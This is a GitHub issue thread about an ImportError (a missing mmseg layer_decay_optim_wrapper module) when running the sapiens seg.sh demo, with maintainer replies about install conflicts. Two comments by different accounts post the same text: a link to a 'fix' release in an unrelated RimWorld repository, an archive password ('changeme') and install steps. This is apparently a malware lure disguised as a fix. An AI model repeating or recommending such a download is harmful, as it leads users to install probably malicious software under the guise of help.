### ISSUE TITLE
seg.sh error

### ISSUE THREAD

**Issue by wangxr1999** [facebookresearch/sapiens#35]
Great Jobs，But I get some errors when I run ./seg.sh:
[2024-08-29 09:08:13,220] [INFO] [real_accelerator.py:191:get_accelerator] Setting ds_accelerator to cuda (auto detect)
Traceback (most recent call last):
  File "/home/telenlp/miniconda3/envs/animate/lib/python3.10/site-packages/mmengine/utils/misc.py", line 77, in import_modules_from_strings
    imported_tmp = import_module(imp)
  File "/home/telenlp/miniconda3/envs/animate/lib/python3.10/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1004, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'mmseg.engine.optimizers.layer_decay_optim_wrapper'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/telenlp/miniconda3/envs/animate/lib/python3.10/site-packages/mmengine/config/config.py", line 407, in fromfile
    import_modules_from_strings(**cfg_dict['custom_imports'])
  File "/home/telenlp/miniconda3/envs/animate/lib/python3.10/site-packages/mmengine/utils/misc.py", line 84, in import_modules_from_strings
    raise ImportError(f'Failed to import {imp}')
ImportError: Failed to import mmseg.engine.optimizers.layer_decay_optim_wrapper

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "./seg/demo/demo_seg_vis.py", line 89, in <module>
    main()
  File "./seg/demo/demo_seg_vis.py", line 35, in main
    model = init_model(args.config, args.checkpoint, device=args.device)
  File "./seg/scripts/demo/local/mmsegmentation/mmseg/apis/inference.py", line 41, in init_model
    config = Config.fromfile(config)
  File "/envs/animate/lib/python3.10/site-packages/mmengine/config/config.py", line 419, in fromfile
    raise ImportError(err_msg) from e
ImportError: Failed to import custom modules from {'imports': ['mmseg.engine.optimizers.layer_decay_optim_wrapper'], 'allow_failed_imports': False}, the current sys.path is: 
    /damoxing/nvfile-data/workspace/code/sapiens/seg/demo
    ./animate/lib/python310.zip
    ./animate/lib/python3.10
   ./animate/lib/python3.10/lib-dynload
  ./animate/lib/python3.10/site-packages
    ./lib/python3.10/site-packages/onefx-0.0.3-py3.10.egg
   ./seg/scripts/demo/local/mmsegmentation
   .sapiens/seg
    /tmp/tmpaeyr80io
You should set `PYTHONPATH` to make `sys.path` include the directory which contains your custom module
./seg/scripts/demo/local
Processing complete.
Results saved to /home/rawalk/Desktop/sapiens/seg/Outputs/vis/itw_videos/reel1_seg/sapiens_0.6b

**Comment by rawalkhirodkar** [comment]
@wangxr1999 Did you install the mmseg packages as editable? pip install -e .

**Comment by wangxr1999** [comment]
yes,Is it because it conflicts with the mmsegmentation I originally installed（ https://github.com/open-mmlab/mmsegmentation/blob/main/docs/en/get_started.md#installation )

> @wangxr1999 Did you install the mmseg packages as editable? pip install -e .

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rawalkhirodkar** [comment]
Yes, it might be conflicting with another version. 
Please uninstall it and install the package from the sapiens repo from source using pip.
